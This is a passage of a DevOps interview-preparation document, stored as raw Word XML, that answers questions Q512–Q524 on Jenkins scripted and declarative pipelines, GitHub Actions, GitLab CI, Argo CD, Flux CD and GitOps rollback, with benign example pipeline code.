        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>A Jenkinsfile is a text file that defines a Jenkins Pipeline using Groovy syntax. It is stored in the application’s source code repository and enables Pipeline as Code. The Jenkinsfile contains stages such as checkout, build, test, security scanning, packaging, and deployment. When a pipeline is triggered, Jenkins reads the Jenkinsfile and executes the defined steps automatically. Using a Jenkinsfile provides version control, consistency, reusability, and easier maintenance of CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q513. Explain scripted pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Scripted Pipeline?</w:t>
        <w:br/>
        <w:t>A Scripted Pipeline is a Jenkins Pipeline written using Groovy scripting syntax that provides maximum flexibility and control over the CI/CD workflow.</w:t>
        <w:br/>
        <w:t>It is the original Jenkins Pipeline format and is useful for complex logic, loops, conditions, and custom workflows.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic Structure</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Building Application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Running Tests'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Deploying Application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Explanation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * node {} → Allocates a Jenkins agent/workspace.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * stage {} → Logical section of the pipeline.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * echo → Prints messages in the console.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Checkout') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        git 'https://github.com/company/app.git'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sh 'mvn test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Docker Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sh 'docker build -t app:v1 .'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sh 'kubectl apply -f deployment.yaml'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Pipeline Flow:</w:t>
        <w:br/>
        <w:t>Checkout</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Docker Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Conditional Logic</w:t>
        <w:br/>
        <w:t>One advantage of Scripted Pipelines is the ability to use Groovy conditions.</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (env.BRANCH_NAME == 'main') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            sh 'kubectl apply -f deployment.yaml'</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Deploys only when the branch is main.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Loops Example</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    def environments = ['dev', 'qa', 'prod']</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    for(envName in environments) {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage("Deploy-${envName}") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            echo "Deploying to ${envName}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Deploy-dev</w:t>
        <w:br/>
        <w:t>Deploy-qa</w:t>
        <w:br/>
        <w:t>Deploy-prod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Parallel Execution</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Parallel Tests') {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        parallel(</w:t>
        <w:br/>
        <w:t xml:space="preserve">            UnitTest: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">            SecurityScan: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'trivy image app:v1'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        )</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>This runs both jobs simultaneously, reducing pipeline execution time.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Exception Handling</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            sh 'mvn package'</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    } catch(Exception e) {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        echo "Build Failed"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    } finally {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        echo "Pipeline Finished"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Useful for error handling and notifications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scripted vs Declarative Pipeline</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scripted Pipeline</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative Pipeline</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Groovy Code</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Structured DSL</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning Curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex Logic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Excellent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Readability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended for New Projects</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to Use Scripted Pipelines?</w:t>
        <w:br/>
        <w:t>Use Scripted Pipelines when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Complex conditional workflows are required.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dynamic stage creation is needed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Advanced loops and branching logic are required.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Custom Groovy scripting is necessary.</w:t>
        <w:br/>
        <w:t>For most modern projects, Declarative Pipelines are preferred because they are easier to maintain.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>A Scripted Pipeline is a Jenkins Pipeline written in Groovy that provides full programming capabilities for defining CI/CD workflows. It uses the node block to allocate an agent and allows developers to implement advanced logic such as loops, conditions, parallel execution, and exception handling. Scripted Pipelines are highly flexible and suitable for complex workflows, but they are more difficult to read and maintain than Declarative Pipelines. In practice, Declarative Pipelines are generally preferred, while Scripted Pipelines are used when advanced customization is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q514. What is declarative pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Declarative Pipeline?</w:t>
        <w:br/>
        <w:t>A Declarative Pipeline is a Jenkins Pipeline written using a structured, predefined syntax (DSL) that makes CI/CD pipelines easier to write, read, and maintain.</w:t>
        <w:br/>
        <w:t>It is the recommended approach for creating Jenkins pipelines because it is simpler and less error-prone than Scripted Pipelines.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic Structure</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Building Application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Running Tests'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Deploying Application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipeline Flow</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:t>Each stage executes in sequence.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Main Components</w:t>
        <w:br/>
        <w:t>1. Pipeline</w:t>
        <w:br/>
        <w:t>The top-level block.</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Defines the entire CI/CD workflow.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Agent</w:t>
        <w:br/>
        <w:t>Specifies where the pipeline runs.</w:t>
        <w:br/>
        <w:t>agent any</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>agent {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    label 'docker-agent'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Stages</w:t>
        <w:br/>
        <w:t>Logical phases of the pipeline.</w:t>
        <w:br/>
        <w:t>stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {}</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Steps</w:t>
        <w:br/>
        <w:t>Actual commands executed inside stages.</w:t>
        <w:br/>
        <w:t>steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Checkout') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                git 'https://github.com/company/app.git'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Docker Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'docker build -t app:v1 .'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'kubectl apply -f deployment.yaml'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Environment Variables</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    environment {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        APP_NAME = 'my-app'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo "${APP_NAME}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Conditional Execution</w:t>
        <w:br/>
        <w:t>stage('Deploy') {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    when {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        branch 'main'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sh 'kubectl apply -f deployment.yaml'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>The deployment stage runs only on the main branch.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Post Actions</w:t>
        <w:br/>
        <w:t>Executed after pipeline completion.</w:t>
        <w:br/>
        <w:t>post {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    success {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Successful'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    failure {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Failed'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    always {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Pipeline Finished'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Parallel Stages</w:t>
        <w:br/>
        <w:t>stage('Tests') {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    parallel {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Unit Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Security Scan') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'trivy image app:v1'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>This runs both stages simultaneously.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Declarative vs Scripted</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Declarative</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scripted</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Structured DSL</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Groovy Code</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Readability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning Curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Steeper</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Harder</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>For advanced use cases</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Easier to read</w:t>
        <w:br/>
        <w:t>✅ Easier to maintain</w:t>
        <w:br/>
        <w:t>✅ Built-in error handling</w:t>
        <w:br/>
        <w:t>✅ Supports CI/CD best practices</w:t>
        <w:br/>
        <w:t>✅ Suitable for most enterprise pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>A Declarative Pipeline is a Jenkins Pipeline written using a structured DSL syntax that defines CI/CD workflows in a simple and readable manner. It consists of blocks such as pipeline, agent, stages, and steps. Declarative Pipelines support features like environment variables, conditional execution, parallel stages, and post-build actions. They are easier to maintain and are the recommended approach for implementing Jenkins pipelines. In my projects, I typically use Declarative Pipelines to automate build, test, Docker image creation, security scanning, and Kubernetes deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q515. Explain GitHub Actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitHub Actions is a GitHub-native CI/CD platform that runs workflows from YAML files stored in a repository. It is commonly used to build, test, scan, package, and deploy applications whenever code is pushed, a pull request is opened, or a manual trigger is used.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Github Actions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Q516. What are GitHub runners?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitHub runners are the machines that execute GitHub Actions jobs. They can be GitHub-hosted runners for quick managed execution or self-hosted runners when teams need private networking, custom tools, larger machines, GPUs, or stricter security control.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Github Runners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Q517. Explain reusable workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reusable workflows allow one GitHub Actions workflow to call another workflow, so common CI/CD logic can be shared across repositories. They reduce duplication, standardize quality gates, and make enterprise pipeline governance easier.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Reusable Workflows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Q518. What is GitLab CI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitLab CI is GitLab’s built-in CI/CD system that uses a .gitlab-ci.yml file to define stages, jobs, runners, artifacts, variables, and deployment rules. It is useful when source control, CI/CD, security scanning, and release management are handled inside GitLab.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Gitlab Ci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Q519. What is ArgoCD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Argo CD is a GitOps continuous delivery tool for Kubernetes. It continuously compares the desired state stored in Git with the live cluster state and syncs applications when drift is detected.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Argocd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Q520. Explain Argo Workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Argo Workflows is a Kubernetes-native workflow engine for running DAG-based or step-based jobs in containers. It is often used for batch jobs, data pipelines, ML workflows, and complex automation that benefits from Kubernetes scheduling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Argo Workflows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Q521. What is FluxCD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Flux CD is a GitOps toolkit for Kubernetes that reconciles cluster resources from Git, Helm repositories, and image registries. It is lightweight, composable, and commonly used to automate deployments while keeping Git as the source of truth.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fluxcd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Q522. Explain rollback in GitOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Rollback in GitOps means reverting the desired state in Git to a previous known-good version and allowing the controller, such as Argo CD or Flux, to reconcile the cluster. This makes rollback auditable because the recovery action is recorded as a Git change.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rollback In GitOps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Q523. What is image automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Image automation updates deployment manifests automatically when a new approved container image is available. In GitOps, tools can detect image tags, update Git manifests, and let the GitOps controller deploy the new version.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Image Automation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Q524. Explain webhook triggers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
